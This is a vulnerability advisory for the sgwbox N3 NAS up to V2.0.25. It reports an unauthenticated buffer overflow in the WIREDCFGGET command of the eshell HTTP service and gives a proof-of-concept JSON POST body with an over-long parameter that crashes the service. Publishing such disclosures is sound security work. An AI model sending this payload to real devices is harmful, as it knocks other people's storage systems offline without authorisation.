Vendor: sgwbox
Affected products: N3 NAS ≤ V2.0.25
Vendor Homepage: https://mall.sgwbox.com/
Vendor contact information: mailto:box@new1cloud.com
An unauthorized buffer overflow vulnerability exists in the sgwbox NAS N3. This vulnerability stems from the lack of length validation and limitation on fields passed to the WIREDCFGGET command interface. An unauthenticated remote attacker could exploit this vulnerability to cause the service crash on the remote target NAS device, enabling a remote denial-of-service attack.
The /usr/sbin/http_eshell_server file shows that the WIREDCFGGET command interface does not perform any authentication or verification, and the first parameter of the retrieved params is concatenated using sprintf without any length validation.
Therefore, an unauthorized buffer overflow vulnerability exists here. An unauthenticated attacker could exploit this vulnerability to cause a remote target NAS device to crash, thus completing a remote denial-of-service attack.
Without authentication, an attacker sends a POST request message in JSON format to the /eshell API interface without any token information. For the WIREDCFGGET command interface, writing an excessively long string as the first parameter of params.
{
"params": [
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
],
"cmd": "WIREDCFGGET"
}
Ultimately, the http_eshell_server service associated with the remote target NAS device crashed, leading to a remote denial-of-service attack.
